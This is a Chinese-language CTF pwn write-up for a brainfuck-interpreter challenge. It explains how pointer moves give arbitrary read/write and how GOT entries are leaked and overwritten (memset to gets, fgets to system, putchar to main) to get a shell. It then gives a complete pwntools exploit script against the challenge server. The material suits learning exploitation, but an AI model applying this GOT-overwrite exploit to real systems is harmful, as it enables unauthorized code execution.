文章目录
- 前置知识
- 整体思路
- exp
前置知识
- 改
got表
整体思路
这道题看起来是在解析brainfuck,我对这方面的知识可以说是一窍不通,但是看了看代码感觉并不需要我们懂brainfuck。
首先我们需要输入一个长度最大为1024的字符串,然后其会逐字符解析该字符串。
其中,<和>可以移动指针p指向的内容,初始的p为0x0804A0A0。
+和-可以使得指针p指向的内容加一或者减一。通过这些目前我们可以实现任意地址写了。
.可以输出p指向的字符,因此要输出一个32位地址需要输出4次。
,可以从标准输入读取一个字符,优点是,可以在我们泄露了libc地址之后再使用,读入泄露出来的libc的地址。
我的exp比较混乱,这里详细说一下思路,师傅们可以自行实现:
- 通过
+ - .来泄露puts的got表,获取libc地址 - 更改
memset函数的got表为gets函数的地址 - 更改
fgets函数的got表为system函数的地址 - 更改
putchar的got表为main函数地址 - 输入一个
,来触发putchar,从而返回到main函数,由此输入/bin/sh获得shell
exp
from pwn import *
from LibcSearcher import *
filename = './bf'
context(log_level='debug')
local = 0
all_logs = []
elf = ELF(filename)
# libc = elf.libc
libc = ELF('./libc.so.6')
if local:
sh = process(filename)
else:
sh = remote('node5.buuoj.cn', 29708)
def debug():
for an_log in all_logs:
success(an_log)
pid = util.proc.pidof(sh)[0]
gdb.attach(pid, 'b *0x08048791')
pause()
def leak_info(name, addr):
output_log = '{} => {}'.format(name, hex(addr))
all_logs.append(output_log)
success(output_log)
def add_addr():
return b'>'
def dec_addr():
return b'<'
def add_value():
return b'+'
def dec_value():
return b'-'
def output_value():
return b'.'
def change_byte():
return b','
raw_p = 0x0804A0A0
# 0x0804A080
fini_array = 0x08049F0C + 4
main_addr = elf.sym['main']
# print('puts_got: {}'.format(hex(elf.got['puts'])))
sh.recvuntil('type some brainfuck instructions except [ ]\n')
payload = (raw_p - (elf.got['puts'] + 3))*dec_addr() + output_value() + dec_addr() + output_value() + dec_addr() + output_value() + dec_addr() + output_value()
payload += 0x18*add_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte()
payload += 7*dec_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte()
payload += (0x1c + 3)*dec_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte() + add_addr() + change_byte()
payload += output_value()
sh.sendline(payload)
sh.send(p8(main_addr & 0x000000ff))
sh.send(p8((main_addr & 0x0000ff00) >> 8))
sh.send(p8((main_addr & 0x00ff0000) >> 16))
sh.send(p8((main_addr & 0xff000000) >> 24))
# 这里写成sh.recv(1)和sh.recv(3)是因为直接写成sh.recv(4)会收不到...
result = b''
result += sh.recv(1)
result += sh.recv(3)
puts_got = u32(result[::-1])
leak_info('puts_got', puts_got)
libc.address = puts_got - libc.sym['puts']
leak_info('libc.address', libc.address)
sh.send(p8(libc.sym['gets'] & 0x000000ff))
sh.send(p8((libc.sym['gets'] & 0x0000ff00) >> 8))
sh.send(p8((libc.sym['gets'] & 0x00ff0000) >> 16))
sh.send(p8((libc.sym['gets'] & 0xff000000) >> 24))
sh.send(p8(libc.sym['system'] & 0x000000ff))
sh.send(p8((libc.sym['system'] & 0x0000ff00) >> 8))
sh.send(p8((libc.sym['system'] & 0x00ff0000) >> 16))
sh.send(p8((libc.sym['system'] & 0xff000000) >> 24))
sh.recvuntil('type some brainfuck instructions except [ ]\n')
payload = '/bin/sh\x00'
sh.sendline(payload)
sh.interactive()
# pause()
